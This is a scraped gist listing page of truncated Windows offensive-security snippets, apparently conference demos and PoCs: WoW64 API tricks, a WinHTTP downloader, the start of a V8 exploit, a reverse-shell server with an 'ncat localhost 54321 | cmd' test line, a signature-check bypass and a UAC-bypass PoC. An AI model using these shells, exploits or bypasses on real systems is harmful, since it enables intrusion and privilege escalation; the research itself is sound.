aaaddress1
/ wow64Mem_Forensics.cpp
Last active
May 3, 2024 22:12
get 64 bit windows API address in pure 32 bit mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // get 64 bit Windows API in pure 32 bit mode! | |
| // it's necessary to disable all the compiler optimization if you're using MSVC. | |
| // more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
| // by aaaddress1@chroot.org | |
| #include <iostream> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| // ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
| #include "wow64ext.h" |
aaaddress1
/ wow64_read64Env.cpp
Created
April 20, 2021 10:37
fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
| // by aaaddress1@chroot.org | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| typedef struct _PEB_LDR_DATA64 | |
| { | |
| ULONG Length; | |
| BOOLEAN Initialized; | |
| ULONG64 SsHandle; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // memcpy 32bit by aaaddress1@chroot.org | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| int main(void) { | |
| int dummy(0x41414242); | |
| char buf[8] = {0}; | |
| ((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
| puts(buf); |
aaaddress1
/ http_download.h
Last active
May 3, 2024 22:13
using WinHTTP to obtain binary data (MSVC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // using WinHTTP to obtain binary data (MSVC) | |
| // by aaaddress1@chroot.org | |
| #include <vector> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <Winhttp.h> | |
| #pragma comment(lib, "winhttp") | |
| using namespace std; | |
| vector<char>* httpRecv(const wchar_t url[]) { |
aaaddress1
/ chrome-v8-issue-1126249.js
Created
March 22, 2021 03:38
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Cmd Multiple RevShell Server by aaaddress1@chroot.org | |
| [test] $ ncat localhost 54321 | cmd | |
| ''' | |
| import time, socket | |
| def handleClient(connection): | |
| try: | |
| time.sleep(1) | |
| connection.send(b'whoami && echo 123 > ggdada.txt && exit\n') | |
| except Exception as e: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dynamic patch self function by aaaddress1@chroot.org | |
| #include <windows.h> | |
| #include <algorithm> | |
| #include <iterator> | |
| using namespace std; | |
| void hello() | |
| { | |
| puts("Are You Helloing?"); | |
| } | |
| int main(void) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // VEH Montior by aaaddress1@chroot.org | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #pragma warning( disable : 4996 ) | |
| LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) { | |
| if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000)) | |
| pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000; | |
| else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
| return EXCEPTION_CONTINUE_SEARCH; |
aaaddress1
/ signBypass.cpp
Last active
May 3, 2024 22:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // iThome 2020 Demo: Signature Patcher for Explorer | |
| // author: aaaddress1@chroot.org | |
| #include <iostream> | |
| #include <Windows.h> | |
| int main() { | |
| DWORD explorer_pid; | |
| GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid); | |
| if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // SITCON 2020 PoC for Windows 7 x86 | |
| // Author: aaaddress1@chroot.org | |
| // cite: github.com/liuxigu/bypassuac/blob/master/bypassuac/bypassuac.cpp | |
| // | |
| #include <Shobjidl.h> | |
| #include "windows.h" | |
| #include "winternl.h" | |
| #include <iostream> | |
| using namespace std; |